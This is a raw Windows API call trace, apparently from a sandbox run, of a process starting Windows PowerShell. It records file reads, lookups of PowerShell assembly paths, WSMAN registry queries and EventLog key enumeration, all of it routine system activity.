	[0383.982] SetErrorMode (uMode=0x1) returned 0x1
	[0383.982] GetFileType (hFile=0x330) returned 0x1
	[0383.982] ReadFile (in: hFile=0x330, lpBuffer=0x3067730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3067730*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.983] ReadFile (in: hFile=0x330, lpBuffer=0x3067730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3067730*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.983] ReadFile (in: hFile=0x330, lpBuffer=0x3067730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3067730*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.983] ReadFile (in: hFile=0x330, lpBuffer=0x3067730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3067730*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0383.983] ReadFile (in: hFile=0x330, lpBuffer=0x3067730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3067730*, lpNumberOfBytesRead=0x24ce18*=0xe98, lpOverlapped=0x0) returned 1
	[0383.984] ReadFile (in: hFile=0x330, lpBuffer=0x3066d30, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3066d30*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0383.984] ReadFile (in: hFile=0x330, lpBuffer=0x3067730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x3067730*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0383.984] CloseHandle (hObject=0x330) returned 1
	[0383.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0383.984] SetErrorMode (uMode=0x1) returned 0x1
	[0383.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0383.984] SetErrorMode (uMode=0x1) returned 0x1
	[0383.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0383.984] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x330) returned 0x0
	[0383.997] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0383.997] CoTaskMemAlloc (cb=0x5a) returned 0x171540
	[0383.997] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x171540, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0383.997] CoTaskMemFree (pv=0x171540) 
	[0383.997] RegCloseKey (hKey=0x330) returned 0x0
	[0383.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0383.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0383.998] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.998] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xb7e07d0f, Data2=0x3bda, Data3=0x426b, Data4=([0]=0x9b, [1]=0xc, [2]=0xb8, [3]=0x3f, [4]=0x7d, [5]=0x3, [6]=0x35, [7]=0x80))) returned 0x0
	[0383.998] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x3ded2810, Data2=0x4d19, Data3=0x4952, Data4=([0]=0xa9, [1]=0x52, [2]=0x7e, [3]=0x92, [4]=0x27, [5]=0x54, [6]=0x9e, [7]=0x37))) returned 0x0
	[0384.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0384.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0384.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0384.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0384.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0384.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0384.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0384.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0384.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0384.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0384.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0384.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0384.976] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0384.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.976] CoTaskMemFree (pv=0x1b770e10) 
	[0384.977] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0384.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.977] CoTaskMemFree (pv=0x1b770e10) 
	[0384.979] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0384.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0384.979] CoTaskMemFree (pv=0x1b770e10) 
	[0385.153] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0385.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.153] CoTaskMemFree (pv=0x1b770e10) 
	[0385.164] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0385.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.164] CoTaskMemFree (pv=0x1b770e10) 
	[0385.166] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0385.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.166] CoTaskMemFree (pv=0x1b770e10) 
	[0385.166] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0385.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.166] CoTaskMemFree (pv=0x1b770e10) 
	[0385.171] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0b8 | out: phkResult=0x24d0b8*=0x330) returned 0x0
	[0385.173] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24cfbc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cfb8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24cfbc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cfb8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.173] CoTaskMemFree (pv=0x0) 
	[0385.173] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.173] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x1027c0, lpcchValueName=0x24d068, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d068, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0385.173] CoTaskMemFree (pv=0x1027c0) 
	[0385.173] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.173] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x1027c0, lpcchValueName=0x24d068, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d068, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0385.173] CoTaskMemFree (pv=0x1027c0) 
	[0385.173] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.173] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x1027c0, lpcchValueName=0x24d068, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d068, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0385.173] CoTaskMemFree (pv=0x1027c0) 
	[0385.174] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x8) returned 0x0
	[0385.174] CoTaskMemAlloc (cb=0xc) returned 0x170da0
	[0385.174] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d01c, lpData=0x170da0, lpcbData=0x24d018*=0x8 | out: lpType=0x24d01c*=0x1, lpData="2.0", lpcbData=0x24d018*=0x8) returned 0x0
	[0385.174] CoTaskMemFree (pv=0x170da0) 
	[0385.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d008 | out: phkResult=0x24d008*=0x304) returned 0x0
	[0385.614] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24cf0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24cf0c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cf08*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.614] CoTaskMemFree (pv=0x0) 
	[0385.614] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.615] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x1027c0, lpcchValueName=0x24cfb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24cfb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0385.615] CoTaskMemFree (pv=0x1027c0) 
	[0385.615] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.615] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x1027c0, lpcchValueName=0x24cfb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24cfb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0385.615] CoTaskMemFree (pv=0x1027c0) 
	[0385.615] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.615] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x1027c0, lpcchValueName=0x24cfb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24cfb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0385.615] CoTaskMemFree (pv=0x1027c0) 
	[0385.615] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24cf9c, lpData=0x0, lpcbData=0x24cf98*=0x0 | out: lpType=0x24cf9c*=0x1, lpData=0x0, lpcbData=0x24cf98*=0x8) returned 0x0
	[0385.615] CoTaskMemAlloc (cb=0xc) returned 0x170840
	[0385.615] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24cf6c, lpData=0x170840, lpcbData=0x24cf68*=0x8 | out: lpType=0x24cf6c*=0x1, lpData="2.0", lpcbData=0x24cf68*=0x8) returned 0x0
	[0385.615] CoTaskMemFree (pv=0x170840) 
	[0385.616] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0385.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.616] CoTaskMemFree (pv=0x1b770e10) 
	[0385.620] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0385.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0385.620] CoTaskMemFree (pv=0x1b770e10) 
	[0385.626] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d038 | out: phkResult=0x24d038*=0x308) returned 0x0
	[0385.629] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24cfac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cfa8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24cfac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24cfa8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.629] CoTaskMemFree (pv=0x0) 
	[0385.630] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.630] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.630] CoTaskMemFree (pv=0x1027c0) 
	[0385.630] CoTaskMemFree (pv=0x0) 
	[0385.630] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.630] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.630] CoTaskMemFree (pv=0x1027c0) 
	[0385.630] CoTaskMemFree (pv=0x0) 
	[0385.630] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.630] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.630] CoTaskMemFree (pv=0x1027c0) 
	[0385.630] CoTaskMemFree (pv=0x0) 
	[0385.630] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.630] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.630] CoTaskMemFree (pv=0x1027c0) 
	[0385.630] CoTaskMemFree (pv=0x0) 
	[0385.630] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.630] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.630] CoTaskMemFree (pv=0x1027c0) 
	[0385.630] CoTaskMemFree (pv=0x0) 
	[0385.630] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.630] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.630] CoTaskMemFree (pv=0x1027c0) 
	[0385.631] CoTaskMemFree (pv=0x0) 
	[0385.631] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.631] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.631] CoTaskMemFree (pv=0x1027c0) 
	[0385.631] CoTaskMemFree (pv=0x0) 
	[0385.631] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.631] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.631] CoTaskMemFree (pv=0x1027c0) 
	[0385.631] CoTaskMemFree (pv=0x0) 
	[0385.631] CoTaskMemAlloc (cb=0x204) returned 0x1027c0
	[0385.631] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x1027c0, lpcchName=0x24d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0385.631] CoTaskMemFree (pv=0x1027c0) 
	[0385.631] CoTaskMemFree (pv=0x0) 
	[0385.631] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x30c) returned 0x0
	[0385.631] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.631] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x320) returned 0x0
	[0385.631] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.632] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x334) returned 0x0
	[0385.632] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.632] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x338) returned 0x0
	[0385.632] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x0) returned 0x2
	[0385.632] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d098 | out: phkResult=0x24d098*=0x33c) returned 0x0
